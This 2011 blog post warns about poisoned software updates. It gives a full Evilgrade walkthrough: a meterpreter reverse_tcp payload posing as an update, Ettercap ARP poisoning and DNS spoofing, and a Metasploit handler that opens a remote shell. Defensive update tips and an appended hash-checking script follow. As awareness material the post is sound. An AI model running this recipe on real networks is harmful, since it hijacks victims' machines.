Thursday, March 24, 2011

Beware of Malicious Updates/Patches

As I was viewing the video presentations from Def Con 18, I came across a unique and incredible pwnage technique to control a PC.  The presentation displayed the insecurity of upgrading/patching versions of 3rd party applications through a tool named Evilgrade.  In essence, when an individual updates an application such as iTunes, Java, Notepad Plus, or any of the 63 other applications supported to date, the download may be malicious software being installed.  This scenario would be a targeted attack.  In other words, an attacker would scan a network for an IP address or target a known individual IP address, and wait for the victim to open a certain application.  When the victim opens the application, there will be a notification for a new update and most likely (near 100%) the victim will click yes to update the software.

For the intended (safe) software upgrade installation, the process would go through the following steps, in layman's terms:

1. The application - I will use Notepad Plus, since that is what I used in the video below - will notify the user of an update when started.

2. The computer will contact the Notepad Plus update server and the server will reply back to the computer.

3. Notepad Plus on the user's computer requests the update file from the Notepad Plus server.

4. Finally, the user's computer will download and execute the file to install the latest version.

In a targeted attack, where the victim's PC accepts what it believes is the latest version of a certain application, the process would be:

1. The attacker will target a PC's IP address and use different toolkits to redirect the address of the Notepad Plus server to the attacker's machine.  The attacker then waits for the victim to open Notepad Plus.

2. Notepad Plus will notify the user of an update when started.

3. When the victim clicks "OK," their machine will obtain the malicious software from the attacker's machine.

4. Now, the attacker will have full control over the victim's machine with the whole update process seemingly normal and nothing out of character.

Cracking Tutorial Video:

Beware of Malicious Updates/Patches from Surapheal Belay on Vimeo.

Command Lines:

  • cd /pentest/exploits/framework3
  • ./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > /root/fakeupdate.exe
  • clear
  • cd
  • cd isr-evilgrade
  • ./evilgrade
  • config notepadplus
  • show options
  • set agent '["<%OUT%>/root/fakeupdate.exe<%OUT%>"]'
  • I went to directory, /usr/share/ettercap
  • Edit etter.dns file
  • Add the appropriate URL and your IP address in the displayed location 
  • Open Ettercap
  • Select 'Sniff'/'Unified Sniffing'/Click OK for the correct network interface used
  • Select 'Host'/'Scan for Hosts'
  • Select 'Host'/'Host List'
  • Select the target IP address and click on 'Add to Target 1'
  • Select 'Mitm'/'ARP Poisoning'/Click OK
  • Select 'Start'/'Start Sniffing'
  • Select 'Plugins'/'Manage Plugins'/Click 'dns_spoof'/Minimize Ettercap window
  • Go back to the console for Evilgrade and type 'start' and hit enter
  • Start a new console
  • cd /pentest/exploits/framework3
  • ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST= LPORT=4444 E
  • Hit enter and wait for Metasploit to start the payload
  • Now, just wait for the victim to check for updates or for the PC to notify the user of an update
  • YES! We have a meterpreter session!
  • From here, we have complete access to the victim's computer.
  • You can view in the video the different commands I demonstrate to confirm that I have control of the victim's PC.

Prevention Tips:

1. It's tedious and annoying but do not go through the application or click on the taskbar to update to the current version.  Go directly to the website to find the download link or scan your PC with Secunia PSI or File Hippo to find out-of-date applications.

2. Do not patch your system on an open wireless network.  Do it within a secure network or at home.

3. Most software companies have a publisher's certificate which verifies the authenticity of the organization.  You may view the certificate through the following steps:

  • In Windows Vista or 7, right-click the executable file and select 'Run as Administrator.'
  • Click the down arrow to show details.
  • Click 'Show more information about this publisher's certificate.'
  • Under the 'General' tab, verify that it was issued to the correct organization and the validation dates are not expired.
  • Select 'Certification Path' and in the box below, make sure that it states the certificate is OK.

4. If available, verify the file's hash.  You can download HashCalc from SlavaSoft to verify the integrity of the file against the hash provided by the developers.  Basically, a hash is a digital fingerprint.  If there is the slightest modification, the hash provided and the hash calculated with HashCalc will be entirely different.  Use HashCalc in the following steps:

  • Open HashCalc and check the appropriate algorithm the developer has provided.
  • Change data format to file.
  • In the data box on the right-hand side there is a button with 3 dots; click it, navigate to where you downloaded your file, select it, and click open.
  • Now, press calculate.
  • After a delay that depends on your computer's speed, a string will appear next to the selected hash; this is the calculated hash of your file.
  • Compare your calculated hash to the developer's hash on the download page.
  • If they are the same then your file is good; if not, your file is corrupt or has been modified and you need to download it again.
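The HashCalc check in tip 4 is easy to script so that it runs before anything is executed. The following is an added example and is not code from the original post: it computes the file's digest in chunks, cleans up the hash string copied from a download page (whitespace, upper case, an "SHA256:" prefix) before comparing, and treats a digest of the wrong length as a failure, since that usually means the wrong algorithm was selected. The function names are my own, the "installer" files are constructed sample data written to a temporary directory, and the published hash used in the demo is the standard SHA-256 test vector for the bytes "abc", not a real developer's hash.

```python
"""Added example: verify a downloaded installer against the hash its
developer publishes (the same check HashCalc performs), scripted so it can
run before the file is executed. Not part of the original post."""
import hashlib
import hmac
import os
import tempfile

CHUNK_SIZE = 1024 * 1024  # hash large installers without loading them whole


def compute_file_hash(path, algorithm="sha256"):
    """Return the lowercase hex digest of the file at `path`."""
    digest = hashlib.new(algorithm)
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(CHUNK_SIZE), b""):
            digest.update(chunk)
    return digest.hexdigest()


def normalize_published_hash(published):
    """Reduce a hash copied from a download page to bare lowercase hex.

    Download pages commonly wrap the value in whitespace, print it in upper
    case, group it in blocks, or prefix it with the algorithm name
    ("SHA256: ..."); a naive string comparison would then report a mismatch
    on a perfectly good file.
    """
    value = published.strip()
    if ":" in value:
        value = value.split(":", 1)[1]
    value = "".join(value.split()).lower()
    if not value or any(ch not in "0123456789abcdef" for ch in value):
        raise ValueError("published hash is not hexadecimal: %r" % published)
    return value


def verify_download(path, published_hash, algorithm="sha256"):
    """True only if the file's digest matches the developer's published hash.

    A length mismatch usually means the wrong algorithm was selected (for
    example an MD5 string compared against a SHA-256 digest); report that as
    a failure so the caller treats it as "do not run this file".
    """
    expected = normalize_published_hash(published_hash)
    actual = compute_file_hash(path, algorithm)
    if len(expected) != len(actual):
        return False
    # Constant-time comparison: not strictly needed for a local file check,
    # but the right habit wherever integrity values are compared.
    return hmac.compare_digest(expected, actual)


def write_constructed_installer(content):
    """Write `content` to a temporary file standing in for a downloaded
    installer (constructed sample data, not a real update); return its path."""
    fd, path = tempfile.mkstemp(suffix=".exe")
    with os.fdopen(fd, "wb") as handle:
        handle.write(content)
    return path


if __name__ == "__main__":
    # Standard SHA-256 test vector for b"abc", formatted the way a download
    # page might print it; stands in for the developer's published hash.
    PUBLISHED = ("SHA256: BA7816BF 8F01CFEA 414140DE 5DAE2223 "
                 "B00361A3 96177A9C B410FF61 F20015AD")
    genuine = write_constructed_installer(b"abc")
    tampered = write_constructed_installer(b"abd")  # one byte changed
    try:
        print("genuine file matches :", verify_download(genuine, PUBLISHED))   # True
        print("tampered file matches:", verify_download(tampered, PUBLISHED))  # False
    finally:
        os.remove(genuine)
        os.remove(tampered)
```

Run it with no arguments to see the genuine copy pass and the one-byte-modified copy fail; for a real download, call `verify_download` with the saved installer's path, the hash string pasted from the developer's page, and the algorithm the page names, and only run the installer if it returns True.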
